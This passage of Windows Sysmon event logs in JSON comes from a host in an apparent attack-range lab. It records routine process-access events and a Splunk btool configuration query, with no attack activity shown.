C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.112","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1751,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.112\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.112","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1752,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.112\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.112","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1753,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.127\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-0010C97B0300}\r\nTargetProcessId: 4004\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.127","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-0010C97B0300}","TargetProcessId":"4004","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1754,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.130\r\nProcessGuid: {41C8662E-1F75-5F25-0000-0010807C0300}\r\nProcessId: 4016\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {41C8662E-1F75-5F25-0000-0010C97B0300}\r\nParentProcessId: 4004\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.130","ProcessGuid":"{41C8662E-1F75-5F25-0000-0010807C0300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{41C8662E-1F75-5F25-0000-0010C97B0300}","ParentProcessId":"4004","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1755,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.127\r\nSourceProcessGUID: {41C8662E-1F75-5F25-0000-0010C97B0300}\r\nSourceProcessId: 4004\r\nSourceThreadId: 4008\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-0010807C0300}\r\nTargetProcessId: 4016\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.127","SourceProcessGUID":"{41C8662E-1F75-5F25-0000-0010C97B0300}","SourceProcessId":"4004","SourceThreadId":"4008","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-0010807C0300}","TargetProcessId":"4016","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1756,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.127\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-0010807C0300}\r\nTargetProcessId: 4016\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.127","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-0010807C0300}","TargetProcessId":"4016","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1757,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1758,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1759,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: 